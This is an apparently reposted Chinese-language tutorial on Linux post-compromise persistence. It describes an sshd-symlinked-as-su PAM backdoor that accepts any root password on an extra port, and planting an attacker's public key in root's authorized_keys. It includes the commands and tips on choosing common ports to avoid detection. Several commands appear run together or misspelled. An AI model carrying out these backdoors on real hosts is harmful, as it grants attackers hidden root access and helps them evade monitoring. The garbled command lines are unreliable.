linux維持訪問-ssh后門


SSHD軟連接后門



軟連接后門是sshd啟用PAM認證的前提下,利用了一個PAM配置文件

將sshd文件生成軟連接,把名稱設置為su,應用在啟動中會去和PAM配置文件夾中尋找是否存在對應名稱的配置信息(su)
只要pam_rootok模塊檢測uid是0即可認證成功,這樣就導致了可以使用任意密碼登錄
開啟PAM認證機制在/etc/ssh/sshd_config文件中,設置UsePAM為yes圖片
查看/etc/pam.d/su文件存在auth  suddicient  pam_rootok.so就能創建軟連接圖片
創建用ln命令建立一個sshd軟連接后門,並開啟一個常見端口

ln -sf /usr/sbin/sshd /tmp/su/tmp/su -oport=2222

圖片

連接然后可以ssh直接連接IP:端口,用戶為root,密碼任意輸入即可圖片好處是能夠繞過一些網絡設備的安全流量監測,但是本地監聽端口時會很容易暴露
所以建議設置成常見端口8080、8000、8081等等
附視頻操作

 

利用公鑰無密碼登錄



原理是用ssh生成一個公鑰放在服務器上,我們就可以通過ssh秘鑰進行無密碼連接服務器了

首先使用攻擊主機生成rsa秘鑰

ssh-keygen -t rsa

圖片
這里有兩個文件idrsa是連接ssh所用的私鑰,idrsa.pub中的內容是公鑰
把idrsa.pub寫入服務端的authorizedkeys中圖片

注意啊沒有這個文件的話,就自己創建一個

在root目錄下

mkdir ~/.sshcd .sshtouch authorized_keys

添加權限,可加可不加。

chmod 600 ~/.ssh/authorized_keyschmod 700 ~/.ssh

然后將公鑰idrsa.pub內容寫入文件

echo "id_rsa.pub的內容" > ~/.ssh/authorized_keys

圖片

然后就可以用ssh使用秘鑰無密碼連接主機了。

圖片

正常連接是提示輸入密碼的,寫入公鑰后無需輸入密碼。

 

附視頻操作


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM